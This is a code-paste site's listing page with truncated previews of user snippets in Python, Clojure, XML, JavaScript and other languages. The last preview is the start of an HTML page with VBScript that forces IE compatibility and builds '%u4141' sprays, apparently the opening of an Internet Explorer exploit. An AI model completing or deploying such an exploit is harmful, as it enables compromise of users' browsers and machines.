Welcome! This page is using CodeRay 1.1.2.
We currently have
3061 rays
in the database.
You can add a
New Ray
or browse the posted rays by pages.
frase sin espacio |
10 lines
of
Python
by
Dragón
|
176 Bytes |
Show |
Edit |
Expand |
1
2
3
4
5
6
7
8
9
10 |
frase = "esta es una frase"
nueva_frase =""
i=0
while i < len(frase):
if frase[i] !=" ":
nueva_frase = nueva_frase + frase[i]
i = i + 1
print nueva_frase |
|
test1 |
3 lines
of
Clojure
by
tk
|
9 Bytes |
Show |
Edit |
Expand |
|
feafea |
1 line
of
Python
by
feafea
|
8 Bytes |
Show |
Edit |
Expand |
|
SHELL |
2 lines
of
YAML
by
gouet
|
85 Bytes |
Show |
Edit |
Expand |
1
2 |
c:\OpenServer\domains\runexis-stat\console
$ yii address/metrotel-update 5000 16254 |
|
test |
1 line
of
C
|
13 Bytes |
Show |
Edit |
Expand |
|
event |
11 lines
of
XML
|
380 Bytes |
Show |
Edit |
Expand |
1
2
3
4
5
6 |
<Events>
<Detection>
<comments>msg</comments>
<eventTime>2015</eventTime>
<messageL>
... |
|
AngularJS |
13 lines
of
JavaScript
by
armadillo
|
339 Bytes |
Show |
Edit |
Expand |
1
2
3
4
5
6 |
var myApp = angular.module('myApp', []);
myApp.controller('MainCtrl', ['$scope', function($scope){
$scope.text = "Hello, Angular fanatic";
}]);
myApp.controller('UserCtrl', ['$sco... |
|
as |
43 lines
of
diff
by
asd
|
1.41 KB |
Show |
Edit |
Expand |
|
Clojure Sample |
171 lines
of
Clojure
by
HSG
|
4.52 KB |
Show |
Edit |
Expand |
1
2
3
4
5
6
7 |
(ns clojure.core.protocols)
(set! *warn-on-reflection* true)
(defprotocol CollReduce
"Protocol for collection types that can implement reduce faster than
first/next recursion. Called by... |
|
aaaaa |
115 lines
of
HTML
|
7.81 KB |
Show |
Edit |
Expand |
1
2
3
4
5
6
7 |
<meta http-equiv="x-ua-compatible" content="IE=10">
<script type="text/vbscript">
Dim aw
Dim plunge(32)
Dim y(32)
prefix = "%u4141%u4141"
d = prefi... |
|